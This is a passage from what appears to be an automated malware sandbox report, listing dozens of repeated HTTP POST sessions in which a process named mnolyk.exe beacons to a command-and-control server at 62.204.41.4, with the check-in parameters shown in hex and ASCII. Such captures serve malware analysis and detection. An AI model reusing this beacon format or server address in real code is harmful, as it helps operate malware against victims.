                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      281192.168.2.74997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:18.678575993 CET396OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.742882013 CET396INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      282192.168.2.74997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:18.914834976 CET397OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:18.980144978 CET397INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      283192.168.2.74997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:19.152479887 CET398OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.216840982 CET398INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      284192.168.2.74997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:19.443583965 CET399OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.507155895 CET399INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      285192.168.2.74998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:19.678958893 CET400OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.741760015 CET400INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      286192.168.2.74998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:19.921142101 CET401OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:19.985157013 CET401INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      287192.168.2.74998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:20.169197083 CET402OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.232326984 CET402INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      288192.168.2.74998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:20.411479950 CET403OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.473516941 CET403INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      289192.168.2.74998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:20.651521921 CET404OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.715797901 CET404INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      29192.168.2.74972362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:08.598237991 CET133OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.660135984 CET133INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      290192.168.2.74998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:20.913009882 CET405OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:20.976932049 CET405INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      291192.168.2.74998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:21.156436920 CET406OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.219510078 CET406INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      292192.168.2.74998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:21.404062986 CET407OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.467391968 CET407INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      293192.168.2.74998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:21.653563976 CET408OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.719542027 CET408INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      294192.168.2.74998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:21.900932074 CET409OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:21.967075109 CET409INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      295192.168.2.74999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:22.153608084 CET410OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:22.219158888 CET410INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      296192.168.2.74999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:22.396521091 CET411OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:22.459316969 CET411INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      297192.168.2.74999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:22.643208981 CET412OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:22.707648039 CET412INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      298192.168.2.74999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:22.893784046 CET413OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:22.958950043 CET413INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      299192.168.2.74999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:23.133002996 CET414OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
